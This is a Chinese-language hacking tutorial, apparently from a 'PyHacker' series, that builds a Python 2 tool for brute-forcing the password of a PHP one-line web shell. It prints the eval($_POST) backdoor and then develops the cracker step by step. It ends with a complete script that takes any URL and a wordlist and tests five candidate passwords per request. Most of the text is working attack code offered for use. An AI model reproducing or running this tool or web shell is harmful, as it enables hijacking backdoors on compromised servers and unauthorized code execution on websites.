这节课是巡安似海PyHacker编写指南的《编写漏洞POC》
使用Python编写一句话密码爆破工具,解脱双手。
编写环境:Python2.x
00x1:
需要用到的模块如下:
import requests
00x2:
首先我们了解一下一句话马,一般post传递参数
一个简单的php一句话
<?php
eval($_POST['x'])
?>
OK,没问题,我们用浏览器打开传参看一下
由此可以看到密码为x,变量提交能匹配上即执行echo语句
这时我猜大家都有了思路,构造post请求即可
00x3:
这里我们可以利用网址特性提交多个参数
这样可以提高爆破效率
分析完成,下面我们开始进行写脚本
00x4:
简单爆破shell密码,shell为字典
#!/usr/bin/python
#-*- coding:utf-8 -*-
import requests
def req(url,s):
global html
data = {s:'echo xc666;'}
req = requests.post(url,data=data)
html = req.content
shell = ['z','y','x']
for s in shell:
req('http://127.0.0.1/shell.php',s)
if 'xc666' in html:
print "[+]Find password",s
break
00x5:
下面我们按我们刚才说的,一次多个参数,增加效率
首先整理一下字典
data = {s:'echo %s;'%s,ss:'echo %s;'%ss}
shell = []
def shelllist():
f = open('shell.txt','r')
for x in f.readlines(): #去除换行等字符
x = x.strip()
shell.append(x)
print u"shell密码个数为:",len(shell)
for i in range(0,len(shell),2): #分割列表
b=shell[i:i+2]
print b
我们一次性提交两个参数测试一下
def main():
shelllist()
for i in range(0,len(shell),2): #分割列表
b=shell[i:i+2]
req('http://127.0.0.1/shell.php',b[0],b[1])
if b[0] in html:
print "[+]Find password",b[0]
break
elif b[1] in html:
print "[+]Find password", b[1]
break
main()
测试一下,一次执行两个密码
00x6:
完整代码:
一次爆破5次密码,可自行调整
#!/usr/bin/python
#-*- coding:utf-8 -*-
import requests
def req(url,s,ss,sss,ssss,sssss):
global html
data = {s:'echo xc666%s;'%s,
ss:'echo xc666%s;'%ss,
sss:'echo xc666%s;'%sss,
ssss:'echo xc666%s;'%ssss,
sssss:'echo xc666%s;'%sssss,}
req = requests.post(url,data=data)
html = req.content
print req.url,s,ss,sss,ssss,sssss
shell = []
def shelllist():
f = open('shell.txt','r')
for x in f.readlines(): #去除换行等字符
x = x.strip()
shell.append(x)
print u"\nshell密码个数为:",len(shell)
def main():
shelllist()
url = raw_input('\nshell url:')
if 'http' not in url:
url = 'http://'+url
for i in range(0,len(shell),5): #分割列表
b=shell[i:i+5]
req(url,b[0],b[1],b[2],b[3],b[4])
if "xc666%s"%b[0] in html:
print "\n[+]Find password",b[0]
break
elif "xc666%s"%b[1] in html:
print "\n[+]Find password", b[1]
break
elif "xc666%s"%b[2] in html:
print "\n[+]Find password",b[2]
break
elif "xc666%s"%b[3] in html:
print "\n[+]Find password", b[3]
break
elif "xc666%s"%b[4] in html:
print "\n[+]Find password", b[4]
break
if __name__ == '__main__':
main()
喜欢的点个赞叭~